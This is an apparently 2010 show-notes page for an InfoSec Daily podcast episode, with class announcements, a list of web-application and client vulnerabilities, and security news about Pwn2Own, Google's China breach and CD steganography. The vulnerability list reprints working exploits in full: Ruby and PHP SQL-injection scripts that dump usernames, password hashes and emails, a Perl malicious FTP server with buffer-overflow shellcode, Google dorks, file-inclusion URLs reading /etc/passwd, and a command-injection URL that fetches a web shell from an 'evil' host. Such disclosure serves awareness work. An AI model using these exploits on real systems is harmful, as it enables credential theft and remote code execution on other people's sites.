Your daily source of Pwnage, Policy and Politics.

Episode 110 – Have you stego’d today?

InfoSec Daily Podcast Episode 110 [ 38:02 | 17.41 MB ] Play Now | Play in Popup | Download (36)

ISD Podcast Episode 110 for April 16, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

  • MHDD Data Recovery Class current dates and locations:
    • San Diego – May 10th-14th
    • San Francisco – June 14th -18th
    • Atlanta – July – 12th-16th
    • Chicago – September – 13th – 17th
    • Dallas, TX – October – 11th – 15th
    • Washington DC – December 6th – 10th
    • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

Kentuckiana ISSA:

Friends of the Podcast: Webhosting services:WebSpeedway

Vulnerabilities of Interest:

    1. Zomplog is subject to a Cross Site Scripting (XSS) vulnerability.  Version 3.9 is impacted, though others may be as well. Proof of Concept URL is available: http://www.sample.com/index.php?search="><scrscriptipt>alert(1)</scrscriptipt>\
    2. MKPortal Anekdot module is subject to a SQL Injection vulnerability.  Proof of Concept URLs are available: http://www.sample.com/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E http://www.sample.com/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
    3. mygamingladder MGL Combo System is subject to a SQL Injection vulnerability.  Versions older than 7.5 are impacted, though others may be as well.  Exploit code is available: #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print " ######################################################### #            4004-Security-Project                      # ######################################################### #             mygamingladder MGL Combo System 7.5       # #                          Exploit                      # #                     Using Host+Path                   # #                     www.demo.de /forum/               # #                         Easy Laster                   # ######################################################### " require 'net/http' print "#########################################################" print "\nEnter host name (site.com)->" host=gets.chomp print "#########################################################" print "\nEnter script path (/forum/)->" path=gets.chomp print "\n#########################################################" begin dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0×23,0×23,0×23,0×23,0×23,id,0×23,0×23,0×23,0×23,0×23),3,4/**/from/**/users–+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nid -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0×23,0×23,0×23,0×23,0×23,pass,0×23,0×23,0×23,0×23,0×23),3,4/**/from/**/users–+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\npassword -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0×23,0×23,0×23,0×23,0×23,email,0×23,0×23,0×23,0×23,0×23),3,4/**/from/**/users–+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail -> "+(/#####(.+)#####/).match(resp.body)[1] print "\n#########################################################" rescue print "\nExploit failed" end
    4. Joomla component allvideos is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_allvideos. Proof of Concept URL is available: http://www.sample.com/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users–
    5. Joomla Component com_properties[aid] is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_properties.  Example URL is available: http://www.sample.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users–
    6. Joomla Component com_ca is subject to a SQL Injection vulnerability.  Version 1.0 is impacted, though others may be as well. Google Dork inurl:option=com_ca.  Example URL is available: http://www.sample.com/index.php?option=com_ca&id=[SQL &#304;NJECT&#304;ON]
    7. Joomla component education is subject to a SQL Injection vulnerability.  Google Dork inurl:option=com_education. Example URL is available:   http://www.sample.com/xampp/joomla/index.php?option=com_education_classes&task=showEvents&id=11/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18–
    8. Joomla Component TRAVELbook is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.1 is impacted, though others may be as well.  Google Dork inurl:option=com_travelbook. Example URLs are available:   http://www.sample.com/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 http://www.sample.com/index.php?option=http://evil/exploit
    9. Joomla Component AlphaUserPoints is subject to a Local File Inclusion (LFI) vulnerability. Version 1.5.5 is impacted, though others may be as well.  Google Dork inurl:option=com_alphauserpoint. Example URL is available:   http://www.sample.com/index.php?option=com_alphauserpoint&view=../../../../../../../../../../etc/passwd%00
    10. Joomla Component spsNewsletter is subject to a Local File Inclusion (LFI) vulnerability. Google Dork inurl:option=com_spsnewsletter. Example URL is available:   http://www.sample.com/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../etc/passwd%00
    11. Joomla Component RokModule is subject to a SQL Injection vulnerability. Google Dork inurl:option=com_rokmodule. Proof of Concept URLs are available:   http://www.sample.com/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=5 << true http://www.sample.com/[path]/index.php?option=com_rokmodule&tmpl=component&type=raw&offset=_OFFSET_&moduleid=140+AND+SUBSTRING(@@version,1,1)=4 << false
    12. Joomla Component Preventive And Reservation is subject to a Local File Inclusion (LFI) vulnerability. Version 1.0.5 is impacted, though others may be as well.  Google Dork inurl:com_preventive&controller. Example URL is available: http://www.sample.com/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
    13. Trellian FTP Client PASV is subject to a Buffer Overflow vulnerability.  Version 3.01 is impacted, though others may be as well.  Exploit code is available: #!/usr/bin/perl use warnings; use strict; use IO::Socket; my $ftpsock = new IO::Socket::INET( LocalPort => '21', Proto => 'tcp', Listen => '1' ) or die "Socket Not Created $!\n"; print"#############################################################\n" . "#          Trellian FTP Client PASV BOF exploit             #\n" . "#          Author:zombiefx                                  #\n" . "#          Greetz to: corelanc0d3r/Dino Dai Zovi            #\n" . "#          http://pentest.cryptocity.net/exploitation/      #\n" . "#          http://www.corelan.be:8800                       #\n" . "#############################################################\n"; my $junk   = "\x41" x 200; my $jmpesp = pack( 'V',0x7E429353 ); #oops my $nops   = "\x90" x 50; my $calcshell = "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41"; while ( my $data = $ftpsock->accept() ) { print "Client Connected!\nAwaiting Ftp commands: \n"; print $data "220 Welcome ;) !\r\n"; while (<$data>) { print; print $data "331 Anonymous access allowed,send e-mail as password.\r\n" if (/USER/i); print $data "230-Welcome to the EVIL server\n230 User logged in.\r\n" if (/PASS/i); print $data "257 \"/\" is current directory.\r\n" if (/PWD/gis); print $data "227 Entering Passive Mode (".$junk.$jmpesp.$nops.$calcshell.").\r\n" if (/PASV/i); print $data "150 Here comes the directory listing.\r\n226 Directory send OK.\r\n" if (/LIST/i); } }
    14. xBtiTracker is subject to a SQL Injection vulnerability.  Version 2.0.0 – revision 559 and older are impacted, though others may be as well.  Exploit code is available: <?php $id = $argv['2']; $name = $argv['3']; $site = $argv['1']; if(isset($argv['3'])) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $site); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,true); curl_setopt($ch, CURLOPT_COOKIE, "uid=$id+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,id,username,password,email, 0x3a3a3a)+from+xbtit_users+where+username='$name'),floor(rand(0)*2))from(information_schema.tables)group+by+2);"); $result = curl_exec($ch); preg_match("/(\d+:.*:[\w\d]{32}:.*):::/i", $result, $match); printf("\nResult: %s\n", $match['1']); } else { print("====================================\n Usage: php btit.php URL ID UserName\n Example: php btit.php http://site.com/ 2 admin\n ====================================\n"); } ?>
    15. MediaInSpot CMS is subject to a Local File Inclusion (LFI) vulnerability.  Example URLs are available:   http://www.sample.com/view/lang/index.php?page=?page=../../../../../../../../etc/passwd%00 http://www.sample.com/view/lang/index.php?page=?page=http://evil/exploit?
    16. AuroraGPT is subject to a  Remote Command Execution vulnerability.  Version 4 is impacted, though others may be as well.  Example URL is available:   http://www.sample.com/index.php?view=help&faq=11&ref&cmd=wget http://evil/exploit.txt -O shell.php

    Stories of Interest:
    News item 1:  http://www.computerworld.com/s/article/9175503/Apple_patches_Pwn2Own_bug?taxonomyId=17
    Apple patched a critical Mac OS X vulnerability used by a security researcher three weeks ago to win $10,000 for hacking Safari at the Pwn2Own contest. The patch is the second resulting from the fourth annual Pwn2Own, which was held at the CanSecWest security conference in Vancouver, British Columbia March 24-26. On the first day of the contest, Charlie Miller, an analyst at Baltimore-based Independent Security Evaluators, hacked Safari running on Mac OS X 10.6, aka Snow Leopard. Miller is the only researcher to ever win three times at Pwn2Own. Miller confirmed that the vulnerability Apple patched was the one he used last month to earn a $10,000 prize. "That must be it," he said. "I haven't given them any other bugs."

    News item 2: http://www.networkworld.com/news/2010/040910-steganography-data-loss.html
    There's a potential new form of steganography — the sending of messages in ways that leave no hint the messages even exists — that could lead to corporate data loss via CDs. Steganography is just one application of technology being researched at Princeton University primarily to create instruments that can see through fog but that could also be used to reveal hidden messages, says one of the researchers, Jason Fleischer, an assistant professor of electrical engineering at the school. If the latest steganography application is brought to fruition, data could be stored on CDs in a way that renders it undetectable by conventional CD players. But with a specially designed player, the hidden data could be read. The researchers' discoveries could also be applied to building radars that work better in storms, improving the imaging of sonograms and crafting night vision goggles with better resolution. In the case of steganography, if thieves could burn stolen data as hidden messages onto part of a CD, the rest could contain benign data that would lead corporate security professionals to think it was a run-of-the-mill CD containing unimportant data. Once the CD was outside corporate control, a special reader could reveal the stolen intellectual property. The technology relies on a characteristic called stochastic resonance, the ability to refocus optical noise so it strengthens the optical signal that it is obscuring, Fleischer says. In the case of fog, images of objects are obscured because the water vapor diffuses the light bouncing off them.

    News item 3: http://news.cnet.com/8301-30684_3-20002315-265.html
    Google learned some hard security lessons after it was attacked late last year by hackers, CEO Eric Schmidt said Monday. "Google is now particularly paranoid about that," Schmidt said during a question-and-answer session following Google's Atmosphere 2010 conference before about 400 CIOs. After the company learned that some of its intellectual property was stolen during an attack that originated from inside China, it began locking down its systems to a greater degree and accelerated plans to move to Web-based systems like Chrome OS netbooks. The attacks took advantage of a flaw in Internet Explorer 6 that was quickly patched, although the damage had been done. More than 30 U.S. companies were believed to be targeted by the attacks, but Google was one of the few that publicly identified itself as a victim because "we decided we had to tell people as a warning," Schmidt said. He declined to get into the specifics of how the attackers penetrated Google's security but said the attackers broke into a single system with the outdated browser and were then able to take "a series of steps" to wreak wider havoc. Google tightened its external defenses and moved quickly to update all the software within its walls following the deconstruction of the attack.

    News item 4:  http://gadgetwise.blogs.nytimes.com/2010/04/08/chrome-browser-unhacked/
    Late last month, Pwn2Own contest, all the browsers fell except Chrome. No one even tried to hack it. Why isn’t entirely clear. Chrome has some security advantages, but its survival doesn’t mean the browser is unbreakable or the most secure, says TippingPoint’s Aaron Portnoy, who organized Pwn2Own. Researchers come to the contest with attacks in their pockets, and like malicious hackers they tend to focus on the most broadly used software. Chrome has a small, albeit growing, market share of 6.1% in March, according to Net Applications. “People think that their time is better spent finding bugs in more popular software because it’s worth more money,” Mr. Portnoy said. Nevertheless, Chrome, as the newest browser on the market, includes security advances that make it an “interesting target.”

    Posted | Comments Off

    Read More